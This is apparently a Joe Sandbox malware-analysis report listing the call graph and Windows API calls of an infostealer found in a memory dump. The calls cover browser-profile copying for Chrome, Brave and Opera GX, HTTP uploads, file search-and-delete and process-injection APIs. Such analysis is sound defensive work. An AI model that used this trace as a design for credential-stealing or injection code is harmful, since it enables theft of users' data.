74891 9247e8 3 API calls 74890->74891 74892 9241b8 74891->74892 74893 9247e8 3 API calls 74892->74893 74894 9241d2 74893->74894 74895 9247e8 3 API calls 74894->74895 74896 9241e8 74895->74896 74897 9247e8 3 API calls 74896->74897 74898 9241ff 74897->74898 74899 9247e8 3 API calls 74898->74899 74900 924216 74899->74900 74901 9247e8 3 API calls 74900->74901 74902 92422d 74901->74902 74903 9247e8 3 API calls 74902->74903 74904 924244 74903->74904 74905 9247e8 3 API calls 74904->74905 74906 924258 74905->74906 74907 9247e8 3 API calls 74906->74907 74908 92426e 74907->74908 74909 9247e8 3 API calls 74908->74909 74910 924288 74909->74910 74911 9247e8 3 API calls 74910->74911 74912 92429f 74911->74912 74913 9247e8 3 API calls 74912->74913 74914 9242b6 74913->74914 74915 9247e8 3 API calls 74914->74915 74916 9242cc 74915->74916 74917 9247e8 3 API calls 74916->74917 74918 9242e3 74917->74918 74919 9247e8 3 API calls 74918->74919 74920 9242fa 74919->74920 74921 9247e8 3 API calls 74920->74921 74922 924311 74921->74922 74923 9247e8 3 API calls 74922->74923 74924 924325 74923->74924 74925 9247e8 3 API calls 74924->74925 74926 92433c 74925->74926 74927 9247e8 3 API calls 74926->74927 74928 924353 74927->74928 74929 9247e8 3 API calls 74928->74929 74930 92436a 74929->74930 74931 9247e8 3 API calls 74930->74931 74932 924381 74931->74932 74933 9247e8 3 API calls 74932->74933 74934 924395 74933->74934 74935 9247e8 3 API calls 74934->74935 74936 9243ac 74935->74936 74937 9247e8 3 API calls 74936->74937 74938 9243c3 74937->74938 74939 9247e8 3 API calls 74938->74939 74940 9243da 74939->74940 74941 9247e8 3 API calls 74940->74941 74942 9243f1 74941->74942 74943 9247e8 3 API calls 74942->74943 74944 924408 74943->74944 74945 9247e8 3 API calls 74944->74945 74946 92441c 74945->74946 74947 9247e8 3 API calls 74946->74947 74948 924433 74947->74948 74949 9247e8 3 API calls 74948->74949 74950 92444a 74949->74950 74951 9247e8 3 API calls 74950->74951 74952 92445e 74951->74952 74953 9247e8 3 
API calls 74952->74953 74954 924472 74953->74954 74955 9247e8 3 API calls 74954->74955 74956 924486 74955->74956 74957 9247e8 3 API calls 74956->74957 74958 9244a0 74957->74958 74959 9247e8 3 API calls 74958->74959 74960 9244b7 74959->74960 74961 9247e8 3 API calls 74960->74961 74962 9244cd 74961->74962 74963 9247e8 3 API calls 74962->74963 74964 9244e4 74963->74964 74965 9247e8 3 API calls 74964->74965 74966 9244fa 74965->74966 74967 9247e8 3 API calls 74966->74967 74968 924511 74967->74968 74969 9247e8 3 API calls 74968->74969 74970 924528 74969->74970 74971 9247e8 3 API calls 74970->74971 74972 92453e 74971->74972 74973 9247e8 3 API calls 74972->74973 74974 924558 74973->74974 74975 9247e8 3 API calls 74974->74975 74976 92456f 74975->74976 74977 9247e8 3 API calls 74976->74977 74978 924586 74977->74978 74979 9247e8 3 API calls 74978->74979 74980 92459d 74979->74980 74981 9247e8 3 API calls 74980->74981 74982 9245b4 74981->74982 74983 9247e8 3 API calls 74982->74983 74984 9245cb 74983->74984 74985 9247e8 3 API calls 74984->74985 74986 9245e2 74985->74986 74987 9247e8 3 API calls 74986->74987 74988 9245f9 74987->74988 74989 9247e8 3 API calls 74988->74989 74990 924612 74989->74990 74991 9247e8 3 API calls 74990->74991 74992 924629 74991->74992 74993 9247e8 3 API calls 74992->74993 74994 924642 74993->74994 74995 9247e8 3 API calls 74994->74995 74996 924656 74995->74996 74997 9247e8 3 API calls 74996->74997 74998 92466d 74997->74998 74999 9247e8 3 API calls 74998->74999 75000 924684 74999->75000 75001 9247e8 3 API calls 75000->75001 75002 92469b 75001->75002 75003 9247e8 3 API calls 75002->75003 75004 9246b2 75003->75004 75005 9247e8 3 API calls 75004->75005 75006 9246cc 75005->75006 75007 9247e8 3 API calls 75006->75007 75008 9246e3 75007->75008 75009 9247e8 3 API calls 75008->75009 75010 9246f9 75009->75010 75011 9247e8 3 API calls 75010->75011 75012 924710 75011->75012 75013 9247e8 3 API calls 75012->75013 75014 924727 75013->75014 75015 9247e8 3 API calls 
75014->75015 75016 92473d 75015->75016 75017 9247e8 3 API calls 75016->75017 75018 924754 75017->75018 75019 9247e8 3 API calls 75018->75019 75020 924768 75019->75020 75021 9247e8 3 API calls 75020->75021 75022 924781 75021->75022 75023 9247e8 3 API calls 75022->75023 75024 924797 75023->75024 75025 9247e8 3 API calls 75024->75025 75026 9247ae 75025->75026 75027 9247e8 3 API calls 75026->75027 75028 9247c5 75027->75028 75029 9247e8 3 API calls 75028->75029 75030 9247dc 75029->75030 75030->74038 76358 94f299 75031->76358 75033 932563 CreateToolhelp32Snapshot Process32First 75034 932597 Process32Next 75033->75034 75035 9325c4 CloseHandle 75033->75035 75034->75035 75036 9325a9 StrCmpCA 75034->75036 76359 94f2f5 75035->76359 75036->75034 75038 9325bb 75036->75038 75038->75034 75041 9304bc lstrcpyA 75040->75041 75042 931c3c 75041->75042 75043 9304bc lstrcpyA 75042->75043 75044 931c4a GetSystemTime 75043->75044 75045 931c66 75044->75045 75046 93d1a8 setSBUpLow 5 API calls 75045->75046 75047 931c9d 75046->75047 75047->74045 75050 9305b6 75048->75050 75049 9305da 75049->74060 75050->75049 75051 9305c8 lstrcpyA lstrcatA 75050->75051 75051->75049 75053 9304ee lstrcpyA 75052->75053 75054 921d07 75053->75054 75055 9304ee lstrcpyA 75054->75055 75056 921d12 75055->75056 75057 9304ee lstrcpyA 75056->75057 75058 921d1d 75057->75058 75059 9304ee lstrcpyA 75058->75059 75060 921d34 75059->75060 75061 9369f8 75060->75061 75062 93051e 2 API calls 75061->75062 75063 936a2e 75062->75063 75064 93051e 2 API calls 75063->75064 75065 936a3b 75064->75065 75066 93051e 2 API calls 75065->75066 75067 936a48 75066->75067 75068 9304bc lstrcpyA 75067->75068 75069 936a55 75068->75069 75070 9304bc lstrcpyA 75069->75070 75071 936a62 75070->75071 75072 9304bc lstrcpyA 75071->75072 75073 936a6f 75072->75073 75074 9304bc lstrcpyA 75073->75074 75075 936a7c 75074->75075 75076 9304bc lstrcpyA 75075->75076 75077 936a89 75076->75077 75078 9304bc lstrcpyA 75077->75078 75101 936a96 75078->75101 75081 936908 33 
API calls 75081->75101 75082 930562 lstrcpyA 75082->75101 75083 936ada StrCmpCA 75084 936b33 StrCmpCA 75083->75084 75083->75101 75085 936e60 75084->75085 75084->75101 75088 930562 lstrcpyA 75085->75088 75089 936e6b 75088->75089 75092 9304bc lstrcpyA 75089->75092 75090 9304ee lstrcpyA 75090->75101 75093 936e78 75092->75093 75094 930562 lstrcpyA 75093->75094 75095 936db8 75094->75095 75096 9304bc lstrcpyA 75095->75096 75097 936e97 75096->75097 75098 930562 lstrcpyA 75097->75098 75100 936ea1 75098->75100 75099 936b93 StrCmpCA 75099->75101 75102 936bec StrCmpCA 75099->75102 76377 936f2e 75100->76377 75101->75081 75101->75082 75101->75083 75101->75084 75101->75090 75101->75099 75101->75102 75112 921cfd lstrcpyA 75101->75112 75114 936c4c StrCmpCA 75101->75114 75115 936ca5 StrCmpCA 75101->75115 75134 936880 28 API calls 75101->75134 76362 9229f8 75101->76362 76365 922a09 75101->76365 76368 922a2b 75101->76368 76371 922a3c 75101->76371 76374 922a4d 75101->76374 76384 922a1a lstrcpyA 75101->76384 76385 922a5e lstrcpyA 75101->76385 76386 922a6f lstrcpyA 75101->76386 76387 922a80 lstrcpyA 75101->76387 75102->75101 75103 936e2f 75102->75103 75106 930562 lstrcpyA 75103->75106 75108 936e3a 75106->75108 75110 9304bc lstrcpyA 75108->75110 75111 936e47 75110->75111 75113 930562 lstrcpyA 75111->75113 75112->75101 75113->75095 75114->75101 75114->75115 75116 936cbb StrCmpCA 75115->75116 75117 936dfe 75115->75117 75120 936dca 75116->75120 75149 936cd1 75116->75149 75119 930562 lstrcpyA 75117->75119 75121 936e09 75119->75121 75123 930562 lstrcpyA 75120->75123 75124 9304bc lstrcpyA 75121->75124 75125 936dd5 75123->75125 75126 936e16 75124->75126 75128 9304bc lstrcpyA 75125->75128 75130 930562 lstrcpyA 75126->75130 75131 936de2 75128->75131 75129 936eb4 75129->74072 75130->75095 75133 930562 lstrcpyA 75131->75133 75132 921cfd lstrcpyA 75132->75149 75133->75095 75134->75101 75136 936d1b StrCmpCA 75137 936d74 StrCmpCA 75136->75137 75136->75149 75138 936d96 75137->75138 75139 936d86 Sleep 
75137->75139 75141 930562 lstrcpyA 75138->75141 75139->75101 75142 936da1 75141->75142 75144 9304bc lstrcpyA 75142->75144 75143 9304ee lstrcpyA 75143->75149 75145 936dae 75144->75145 75146 930562 lstrcpyA 75145->75146 75146->75095 75148 930562 lstrcpyA 75148->75149 75149->75132 75149->75136 75149->75137 75149->75143 75149->75148 76388 922ac4 lstrcpyA 75149->76388 76389 922ad5 lstrcpyA 75149->76389 76390 936908 75149->76390 76410 922ae6 lstrcpyA 75149->76410 76411 936880 75149->76411 75151 930562 lstrcpyA 75150->75151 75152 9383e3 75151->75152 75153 930562 lstrcpyA 75152->75153 75154 9383ee 75153->75154 75155 930562 lstrcpyA 75154->75155 75156 9383f9 75155->75156 75156->74076 75158 9304fe 75157->75158 75159 930513 75158->75159 75160 93050b lstrcpyA 75158->75160 75159->74088 75160->75159 75162 9309b4 75161->75162 75163 9309bb GetVolumeInformationA 75161->75163 75162->75163 75164 930a22 75163->75164 75164->75164 75165 930a37 GetProcessHeap HeapAlloc 75164->75165 75166 930a52 75165->75166 75167 930a61 wsprintfA lstrcatA 75165->75167 75168 9304bc lstrcpyA 75166->75168 76461 931659 GetCurrentHwProfileA 75167->76461 75170 930a5a 75168->75170 75173 93d1a8 setSBUpLow 5 API calls 75170->75173 75171 930a9c lstrlenA 76477 9323aa lstrcpyA malloc strncpy 75171->76477 75175 930b03 75173->75175 75174 930abf lstrcatA 75176 930ad6 75174->75176 75175->74115 75177 9304bc lstrcpyA 75176->75177 75178 930aed 75177->75178 75178->75170 75180 9304ee lstrcpyA 75179->75180 75181 924b59 75180->75181 75182 924ab6 5 API calls 75181->75182 75183 924b65 75182->75183 75184 9304bc lstrcpyA 75183->75184 75185 924b81 75184->75185 75186 9304bc lstrcpyA 75185->75186 75187 924b91 75186->75187 75188 9304bc lstrcpyA 75187->75188 75189 924ba1 75188->75189 75190 9304bc lstrcpyA 75189->75190 75191 924bb1 75190->75191 75192 9304bc lstrcpyA 75191->75192 75193 924bc1 InternetOpenA StrCmpCA 75192->75193 75194 924bf5 75193->75194 75195 925194 InternetCloseHandle 75194->75195 75196 931c1f 7 API calls 75194->75196 
75206 9251e1 75195->75206 75197 924c15 75196->75197 75198 93059c 2 API calls 75197->75198 75199 924c28 75198->75199 75200 930562 lstrcpyA 75199->75200 75201 924c33 75200->75201 75202 9305de 3 API calls 75201->75202 75203 924c5f 75202->75203 75204 930562 lstrcpyA 75203->75204 75205 924c6a 75204->75205 75207 9305de 3 API calls 75205->75207 75208 93d1a8 setSBUpLow 5 API calls 75206->75208 75209 924c8b 75207->75209 75210 925235 75208->75210 75211 930562 lstrcpyA 75209->75211 75312 933a02 StrCmpCA 75210->75312 75212 924c96 75211->75212 75213 93059c 2 API calls 75212->75213 75214 924cb8 75213->75214 75215 930562 lstrcpyA 75214->75215 75216 924cc3 75215->75216 75217 9305de 3 API calls 75216->75217 75218 924ce4 75217->75218 75219 930562 lstrcpyA 75218->75219 75220 924cef 75219->75220 75221 9305de 3 API calls 75220->75221 75222 924d10 75221->75222 75223 930562 lstrcpyA 75222->75223 75224 924d1b 75223->75224 75225 9305de 3 API calls 75224->75225 75226 924d3d 75225->75226 75227 93059c 2 API calls 75226->75227 75228 924d48 75227->75228 75229 930562 lstrcpyA 75228->75229 75230 924d53 75229->75230 75231 924d69 InternetConnectA 75230->75231 75231->75195 75232 924d97 HttpOpenRequestA 75231->75232 75233 924dd7 75232->75233 75234 925188 InternetCloseHandle 75232->75234 75235 924dfb 75233->75235 75236 924ddf InternetSetOptionA 75233->75236 75234->75195 75237 9305de 3 API calls 75235->75237 75236->75235 75238 924e11 75237->75238 75239 930562 lstrcpyA 75238->75239 75240 924e1c 75239->75240 75241 93059c 2 API calls 75240->75241 75242 924e3e 75241->75242 75243 930562 lstrcpyA 75242->75243 75244 924e49 75243->75244 75245 9305de 3 API calls 75244->75245 75246 924e6a 75245->75246 75247 930562 lstrcpyA 75246->75247 75248 924e75 75247->75248 75249 9305de 3 API calls 75248->75249 75250 924e97 75249->75250 75251 930562 lstrcpyA 75250->75251 75252 924ea2 75251->75252 75253 9305de 3 API calls 75252->75253 75254 924ec3 75253->75254 75255 930562 lstrcpyA 75254->75255 75256 924ece 75255->75256 75257 
9305de 3 API calls 75256->75257 75258 924eef 75257->75258 75259 930562 lstrcpyA 75258->75259 75260 924efa 75259->75260 75261 93059c 2 API calls 75260->75261 75262 924f19 75261->75262 75263 930562 lstrcpyA 75262->75263 75264 924f24 75263->75264 75265 9305de 3 API calls 75264->75265 75266 924f45 75265->75266 75267 930562 lstrcpyA 75266->75267 75268 924f50 75267->75268 75269 9305de 3 API calls 75268->75269 75270 924f71 75269->75270 75271 930562 lstrcpyA 75270->75271 75272 924f7c 75271->75272 75273 93059c 2 API calls 75272->75273 75274 924f9e 75273->75274 75275 930562 lstrcpyA 75274->75275 75276 924fa9 75275->75276 75277 9305de 3 API calls 75276->75277 75278 924fca 75277->75278 75279 930562 lstrcpyA 75278->75279 75280 924fd5 75279->75280 75281 9305de 3 API calls 75280->75281 75282 924ff7 75281->75282 75283 930562 lstrcpyA 75282->75283 75284 925002 75283->75284 75285 9305de 3 API calls 75284->75285 75286 925023 75285->75286 75287 930562 lstrcpyA 75286->75287 75288 92502e 75287->75288 75289 9305de 3 API calls 75288->75289 75290 92504f 75289->75290 75291 930562 lstrcpyA 75290->75291 75292 92505a 75291->75292 75293 93059c 2 API calls 75292->75293 75294 925079 75293->75294 75295 930562 lstrcpyA 75294->75295 75296 925084 75295->75296 75297 9304bc lstrcpyA 75296->75297 75298 92509f 75297->75298 75299 93059c 2 API calls 75298->75299 75300 9250b6 75299->75300 75301 93059c 2 API calls 75300->75301 75302 9250c7 75301->75302 75303 930562 lstrcpyA 75302->75303 75304 9250d2 75303->75304 75305 9250e8 lstrlenA lstrlenA HttpSendRequestA 75304->75305 75306 92515c InternetReadFile 75305->75306 75307 925176 InternetCloseHandle 75306->75307 75310 92511c 75306->75310 75308 922920 75307->75308 75308->75234 75309 9305de 3 API calls 75309->75310 75310->75306 75310->75307 75310->75309 75311 930562 lstrcpyA 75310->75311 75311->75310 75313 933a21 ExitProcess 75312->75313 75314 933a28 strtok_s 75312->75314 75315 933a44 75314->75315 75316 933b88 75314->75316 75317 933b6a strtok_s 75315->75317 75318 
933a61 StrCmpCA 75315->75318 75319 933b56 StrCmpCA 75315->75319 75320 933ab5 StrCmpCA 75315->75320 75321 933af4 StrCmpCA 75315->75321 75322 933b34 StrCmpCA 75315->75322 75323 933a99 StrCmpCA 75315->75323 75324 933b09 StrCmpCA 75315->75324 75325 933adf StrCmpCA 75315->75325 75326 933b1e StrCmpCA 75315->75326 75327 933a7d StrCmpCA 75315->75327 75328 93051e 2 API calls 75315->75328 75316->74123 75317->75315 75317->75316 75318->75315 75318->75317 75319->75317 75320->75315 75320->75317 75321->75315 75321->75317 75322->75317 75323->75315 75323->75317 75324->75315 75324->75317 75325->75315 75325->75317 75326->75317 75327->75315 75327->75317 75328->75315 75330 9304ee lstrcpyA 75329->75330 75331 925f64 75330->75331 75332 924ab6 5 API calls 75331->75332 75333 925f70 75332->75333 75334 9304bc lstrcpyA 75333->75334 75335 925f8c 75334->75335 75336 9304bc lstrcpyA 75335->75336 75337 925f9c 75336->75337 75338 9304bc lstrcpyA 75337->75338 75339 925fac 75338->75339 75340 9304bc lstrcpyA 75339->75340 75341 925fbc 75340->75341 75342 9304bc lstrcpyA 75341->75342 75343 925fcc InternetOpenA StrCmpCA 75342->75343 75344 926000 75343->75344 75345 9266ff InternetCloseHandle 75344->75345 75346 931c1f 7 API calls 75344->75346 76483 928048 CryptStringToBinaryA 75345->76483 75349 926020 75346->75349 75350 93059c 2 API calls 75349->75350 75352 926033 75350->75352 75351 93051e 2 API calls 75354 926739 75351->75354 75353 930562 lstrcpyA 75352->75353 75358 92603e 75353->75358 75355 9305de 3 API calls 75354->75355 75356 926750 75355->75356 75357 930562 lstrcpyA 75356->75357 75361 92675b 75357->75361 75359 9305de 3 API calls 75358->75359 75360 92606a 75359->75360 75362 930562 lstrcpyA 75360->75362 75364 93d1a8 setSBUpLow 5 API calls 75361->75364 75363 926075 75362->75363 75365 9305de 3 API calls 75363->75365 75366 9267eb 75364->75366 75367 926096 75365->75367 75496 93347f strtok_s 75366->75496 75368 930562 lstrcpyA 75367->75368 75369 9260a1 75368->75369 75370 93059c 2 API calls 75369->75370 75371 

Memory Dump Source
• Source File: 00000002.00000002.3393003879.0000000000920000.00000040.00000400.00020000.00000000.sdmp, Offset: 00920000, based on PE: true
• Associated: 00000002.00000002.3393003879.000000000099D000.00000040.00000400.00020000.00000000.sdmp
• Associated: 00000002.00000002.3393003879.0000000000AB5000.00000040.00000400.00020000.00000000.sdmp
• Associated: 00000002.00000002.3393003879.0000000000AB8000.00000040.00000400.00020000.00000000.sdmp
• Associated: 00000002.00000002.3393003879.0000000000ABE000.00000040.00000400.00020000.00000000.sdmp
• Associated: 00000002.00000002.3393003879.0000000000ADD000.00000040.00000400.00020000.00000000.sdmp
• Associated: 00000002.00000002.3393003879.0000000000AFC000.00000040.00000400.00020000.00000000.sdmp
• Associated: 00000002.00000002.3393003879.0000000000B7D000.00000040.00000400.00020000.00000000.sdmp
• Associated: 00000002.00000002.3393003879.0000000000B90000.00000040.00000400.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_920000_7ZthFNAqYp.jbxd
Yara matches
Similarity
• API ID: AddressProc$LibraryLoad
• String ID: CreateProcessA$GetThreadContext$HttpQueryInfoA$InternetSetOptionA$ReadProcessMemory$ResumeThread$SetThreadContext$SymMatchString$VirtualAllocEx$WriteProcessMemory$dbghelp.dll
• API String ID: 2238633743-2740034357
• Opcode ID: 734b5e6788b06057968436ff28dbf813dc10f6507fa0f4e1df7eebaca41b5379
• Instruction ID: 94151f735e3e2f0937d1e95f54de3e84cff0ce7fcc9845b15f0ec5c93945063c
• Opcode Fuzzy Hash: 734b5e6788b06057968436ff28dbf813dc10f6507fa0f4e1df7eebaca41b5379
• Instruction Fuzzy Hash: 5852E9B5901212AFDB025F60FD499143ABAFF0C34531299A5E92D9B272DF72C8D0EF19

                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • wsprintfA.USER32 ref: 00934D5C
                                                                                                                                                                                                              • FindFirstFileA.KERNEL32(?,?), ref: 00934D73
                                                                                                                                                                                                              • _memset.LIBCMT ref: 00934D8F
                                                                                                                                                                                                              • _memset.LIBCMT ref: 00934DA0
                                                                                                                                                                                                              • StrCmpCA.SHLWAPI(?,00956A00), ref: 00934DC1
                                                                                                                                                                                                              • StrCmpCA.SHLWAPI(?,00956A04), ref: 00934DDB
                                                                                                                                                                                                              • wsprintfA.USER32 ref: 00934E02
                                                                                                                                                                                                              • StrCmpCA.SHLWAPI(?,0095660F), ref: 00934E16
                                                                                                                                                                                                              • wsprintfA.USER32 ref: 00934E3F
                                                                                                                                                                                                              • wsprintfA.USER32 ref: 00934E56
                                                                                                                                                                                                                • Part of subcall function 009305DE: lstrlenA.KERNEL32(?,00000000,?,?,?,?,00937228,00956C20,00000000,009566BA,?,?,?,?,0093871B), ref: 009305F2
                                                                                                                                                                                                                • Part of subcall function 009305DE: lstrcpyA.KERNEL32(00000000,?,?,?,?,?,00937228,00956C20,00000000,009566BA,?,?,?,?,0093871B), ref: 0093061A
                                                                                                                                                                                                                • Part of subcall function 009305DE: lstrcatA.KERNEL32(?,00000000,?,?,?,?,00937228,00956C20,00000000,009566BA,?,?,?,?,0093871B), ref: 00930625
                                                                                                                                                                                                                • Part of subcall function 0093059C: lstrcpyA.KERNEL32(00000000,?,0000000C,00937775,009566D6), ref: 009305CA
                                                                                                                                                                                                                • Part of subcall function 0093059C: lstrcatA.KERNEL32(?,?), ref: 009305D4
                                                                                                                                                                                                                • Part of subcall function 00930562: lstrcpyA.KERNEL32(00000000,?,00000000,00937246,00956C20,00000000,009566BA,?,?,?,?,0093871B), ref: 00930592
                                                                                                                                                                                                              • _memset.LIBCMT ref: 00934E68
                                                                                                                                                                                                              • lstrcatA.KERNEL32(?,?), ref: 00934E7D
                                                                                                                                                                                                              • strtok_s.MSVCRT ref: 00934EC2
                                                                                                                                                                                                              • _memset.LIBCMT ref: 00934ED4
                                                                                                                                                                                                              • lstrcatA.KERNEL32(?,?), ref: 00934EE9
                                                                                                                                                                                                              • strtok_s.MSVCRT ref: 00934F02
                                                                                                                                                                                                              • PathMatchSpecA.SHLWAPI(?,00000000), ref: 00934F17
                                                                                                                                                                                                              • DeleteFileA.KERNEL32(?,00956A30,0095661D), ref: 00934FD0
                                                                                                                                                                                                              • CopyFileA.KERNEL32(?,?,00000001), ref: 00934FE0
                                                                                                                                                                                                                • Part of subcall function 0093213B: CreateFileA.KERNEL32(00934FEC,80000000,00000003,00000000,00000003,00000080,00000000,?,?,?,?,00934FEC,?), ref: 00932156
                                                                                                                                                                                                              • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00934FF6
                                                                                                                                                                                                              • DeleteFileA.KERNEL32(?,00000000,?,000003E8,00000000), ref: 00935001
                                                                                                                                                                                                              • strtok_s.MSVCRT ref: 00935027
                                                                                                                                                                                                              • FindNextFileA.KERNELBASE(?,?), ref: 00935145
                                                                                                                                                                                                              • FindClose.KERNEL32(?), ref: 00935165
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000002.00000002.3393003879.0000000000920000.00000040.00000400.00020000.00000000.sdmp, Offset: 00920000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000002.00000002.3393003879.000000000099D000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                                                                                              • Associated: 00000002.00000002.3393003879.0000000000AB5000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                                                                                              • Associated: 00000002.00000002.3393003879.0000000000AB8000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                                                                                              • Associated: 00000002.00000002.3393003879.0000000000ABE000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                                                                                              • Associated: 00000002.00000002.3393003879.0000000000ADD000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                                                                                              • Associated: 00000002.00000002.3393003879.0000000000AFC000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                                                                                              • Associated: 00000002.00000002.3393003879.0000000000B7D000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                                                                                              • Associated: 00000002.00000002.3393003879.0000000000B90000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_920000_7ZthFNAqYp.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: File$_memsetlstrcatwsprintf$Findlstrcpystrtok_s$Delete$CloseCopyCreateFirstMatchNextPathSpecUnothrow_t@std@@@__ehfuncinfo$??2@lstrlen
                                                                                                                                                                                                              • String ID: %s\%s$%s\%s$%s\%s\%s$%s\*.*
                                                                                                                                                                                                              • API String ID: 956187361-332874205
                                                                                                                                                                                                              • Opcode ID: 627ca8532ee75c927a7b5933429b4071ec012e5990933af445dd2cf9b5e8e79d
                                                                                                                                                                                                              • Instruction ID: e402ea8ac629c45cc4f46ab21e33f4f387d0cc991dd2eec8d4844e7c0c406fb1
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 627ca8532ee75c927a7b5933429b4071ec012e5990933af445dd2cf9b5e8e79d
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 49C107B2D0022AABDF22EF60DC45AAE777CAF48304F4145A5FA09B3155DA35EB858F50

                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                              • Executed
                                                                                                                                                                                                              • Not Executed
                                                                                                                                                                                                              [Control-flow graph for the function starting at 00929CF1; graph image not preserved]
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                • Part of subcall function 009304BC: lstrcpyA.KERNEL32(00000000,00000000,?,00937207,009566BA,?,?,?,?,0093871B), ref: 009304E2
                                                                                                                                                                                                                • Part of subcall function 0093059C: lstrcpyA.KERNEL32(00000000,?,0000000C,00937775,009566D6), ref: 009305CA
                                                                                                                                                                                                                • Part of subcall function 0093059C: lstrcatA.KERNEL32(?,?), ref: 009305D4
                                                                                                                                                                                                                • Part of subcall function 009305DE: lstrlenA.KERNEL32(?,00000000,?,?,?,?,00937228,00956C20,00000000,009566BA,?,?,?,?,0093871B), ref: 009305F2
                                                                                                                                                                                                                • Part of subcall function 009305DE: lstrcpyA.KERNEL32(00000000,?,?,?,?,?,00937228,00956C20,00000000,009566BA,?,?,?,?,0093871B), ref: 0093061A
                                                                                                                                                                                                                • Part of subcall function 009305DE: lstrcatA.KERNEL32(?,00000000,?,?,?,?,00937228,00956C20,00000000,009566BA,?,?,?,?,0093871B), ref: 00930625
                                                                                                                                                                                                                • Part of subcall function 00930562: lstrcpyA.KERNEL32(00000000,?,00000000,00937246,00956C20,00000000,009566BA,?,?,?,?,0093871B), ref: 00930592
                                                                                                                                                                                                              • FindFirstFileA.KERNEL32(?,?,009567F2,009567EF,0095731C,009567EE,?,?,?), ref: 00929D9B
                                                                                                                                                                                                              • StrCmpCA.SHLWAPI(?,00957320), ref: 00929DBC
                                                                                                                                                                                                              • StrCmpCA.SHLWAPI(?,00957324), ref: 00929DD6
                                                                                                                                                                                                                • Part of subcall function 0093051E: lstrlenA.KERNEL32(?,?,00937300,009566BE,009566BB,?,?,?,?,0093871B), ref: 00930524
                                                                                                                                                                                                                • Part of subcall function 0093051E: lstrcpyA.KERNEL32(00000000,00000000,?,00937300,009566BE,009566BB,?,?,?,?,0093871B), ref: 00930556
                                                                                                                                                                                                              • StrCmpCA.SHLWAPI(?,Opera GX,00957328,?,009567F3), ref: 00929E68
                                                                                                                                                                                                              • StrCmpCA.SHLWAPI(?,Brave,00957348,0095734C,00957328,?,009567F3), ref: 00929FEA
                                                                                                                                                                                                              • StrCmpCA.SHLWAPI(?,Preferences), ref: 0092A004
                                                                                                                                                                                                              • CopyFileA.KERNEL32(?,?,00000001), ref: 0092A0C4
                                                                                                                                                                                                              • DeleteFileA.KERNEL32(?), ref: 0092A193
                                                                                                                                                                                                              • StrCmpCA.SHLWAPI(?), ref: 0092A1D1
                                                                                                                                                                                                              • StrCmpCA.SHLWAPI(?), ref: 0092A23B
                                                                                                                                                                                                              • StrCmpCA.SHLWAPI(0092CCBE), ref: 0092A24E
                                                                                                                                                                                                                • Part of subcall function 009304EE: lstrcpyA.KERNEL32(00000000,?,?,00921D07,?,009377AD), ref: 0093050D
                                                                                                                                                                                                              • StrCmpCA.SHLWAPI(?), ref: 0092A331
                                                                                                                                                                                                              • CopyFileA.KERNEL32(?,?,00000001), ref: 0092A3F1
                                                                                                                                                                                                              • StrCmpCA.SHLWAPI(?,Google Chrome), ref: 0092A496
                                                                                                                                                                                                              • DeleteFileA.KERNEL32(?), ref: 0092A4F7
                                                                                                                                                                                                                • Part of subcall function 00928DAC: lstrlenA.KERNEL32(?), ref: 00928FA5
                                                                                                                                                                                                                • Part of subcall function 00928DAC: lstrlenA.KERNEL32(?), ref: 00928FC0
                                                                                                                                                                                                                • Part of subcall function 0092951A: lstrlenA.KERNEL32(?), ref: 00929943
                                                                                                                                                                                                                • Part of subcall function 0092951A: lstrlenA.KERNEL32(?), ref: 0092995E
                                                                                                                                                                                                              • StrCmpCA.SHLWAPI(?), ref: 0092A528
                                                                                                                                                                                                              • CopyFileA.KERNEL32(?,?,00000001), ref: 0092A5E8
                                                                                                                                                                                                              • DeleteFileA.KERNEL32(?), ref: 0092A67F
                                                                                                                                                                                                                • Part of subcall function 00931C1F: GetSystemTime.KERNEL32(?,009566E2,?), ref: 00931C4E
                                                                                                                                                                                                              • FindNextFileA.KERNEL32(?,?), ref: 0092A743
                                                                                                                                                                                                              • FindClose.KERNEL32(?), ref: 0092A757
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000002.00000002.3393003879.0000000000920000.00000040.00000400.00020000.00000000.sdmp, Offset: 00920000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000002.00000002.3393003879.000000000099D000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                                                                                              • Associated: 00000002.00000002.3393003879.0000000000AB5000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                                                                                              • Associated: 00000002.00000002.3393003879.0000000000AB8000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                                                                                              • Associated: 00000002.00000002.3393003879.0000000000ABE000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                                                                                              • Associated: 00000002.00000002.3393003879.0000000000ADD000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                                                                                              • Associated: 00000002.00000002.3393003879.0000000000AFC000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                                                                                              • Associated: 00000002.00000002.3393003879.0000000000B7D000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                                                                                              • Associated: 00000002.00000002.3393003879.0000000000B90000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_920000_7ZthFNAqYp.jbxd
